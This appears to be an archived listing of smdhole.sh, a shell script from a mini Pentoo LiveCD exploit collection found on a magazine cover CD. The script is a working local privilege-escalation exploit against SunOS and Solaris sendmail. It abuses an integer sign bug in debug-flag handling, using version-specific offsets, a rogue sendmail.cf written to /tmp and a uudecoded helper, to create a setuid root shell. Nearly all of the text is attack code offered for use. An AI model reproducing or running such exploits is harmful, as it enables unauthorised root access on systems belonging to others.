Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / smdhole.sh < prev next >

Wrap

Linux/UNIX/POSIX Shell Script | 2005-02-12 | 4KB | 147 lines

#!/bin/sh # This script takes advantage of sendmail's (mis)interpretation of # very large unsigned ints as signed ints when accessing the debug # array. As it, it will work with the 8 versions of sun sendmail # that I have access to. Perhaps I'll update it if I find new # versions of sun sendmail. # NOTE: This is a Sun specific script. Don't expect it to work with # any non-sun sendmail. # -MRW (atreus) # # usage: smdhole [/path/to/suid/sendmail] # if [ $1x = x ]; then sendmail=/usr/lib/sendmail else echo "Trying to abuse $1." sendmail=$1 fi sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g` # prefix and suffix for -1 as unsigned integer. Actually, this is # off by two. you figure out why. prefix=42949 suffix=67297 case $sm_size in 132064) n1=${prefix}52864 n2=${prefix}52865 n3=${prefix}52866 echo Patched solaris w/o mx. ;; 134752) n1=${prefix}1656 n2=${prefix}1657 n3=${prefix}1658 echo Patched solaris sendmail.mx ;; 130860) n1=${prefix}53016 n2=${prefix}53017 n3=${prefix}53018 echo Un-patched solaris w/o mx. ;; 133548) n1=${prefix}1808 n2=${prefix}1809 n3=${prefix}1810 echo Un-patched solaris sendmail.mx ;; 139264) n1=${prefix}49609 n2=${prefix}49610 n3=${prefix}49611 echo Sun 4.1.3 sendmail - could be either of two versions n4=${prefix}49265 n5=${prefix}49266 n6=${prefix}49267 ;; 155648) n1=${prefix}46953 n2=${prefix}46954 n3=${prefix}46955 echo Sun 4.1.3 sendmail.mx - could be either of two versions n4=${prefix}46609 n5=${prefix}46610 n6=${prefix}46611 ;; *) echo "I don't know what version of sendmail $sendmail is." echo -n "Look for other versions of sendmail[.mx] on the " echo "system and re-run this as:" echo " $0 /path/to/another/suid/sendmail" exit 1 ;; esac cat << EOM > /tmp/sendmail.cf DMether DRlocalhost CRlocalhost CDMailer-Daemon root daemon uucp DlFrom \$g \$d Do.:%@!^=/[] Dq\$g\$?x (\$x)\$. De\$j nothing OA./aliases OF0666 Og1 OL0 Oo OPPostmaster OQ. Os Ou1 T root daemon uucp H?F?From: nobody Mlocal, P=/tmp/fixit, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u Mprog, P=/tmp/fixit, F=lsDFMeuP, S=10, R=20, A=sh -c \$u S0 R\$+ \$#local \$:\$1 just rewrite EOM cat $0 | sed "s:atreus::" | uudecode uncompress /tmp/fixit.Z chmod 755 /tmp/fixit mkdir /tmp/mail cp /tmp/sendmail.cf /tmp/mail cp /bin/sh /tmp/newsh chmod 666 /tmp/newsh $sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <<EOF test EOF if [ -x /tmp/newsh ]; then echo "Had the right offset for sendmail.cf. Here's the result:" else echo "Looks like I had the wrong sendmail.cf offset. Fuckers." if [ ${n4}x = x ]; then echo "This version isn't what I thought it was." echo "Look for other suid sendmails and try this on them." else echo "I'm taking another stab with a different offset." $sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF test EOF echo "Here's the result:" fi fi rm /tmp/fixit rm -r /tmp/mail rm /tmp/sendmail.cf ls -l /tmp/newsh exit # www.hack.co.za [2000]#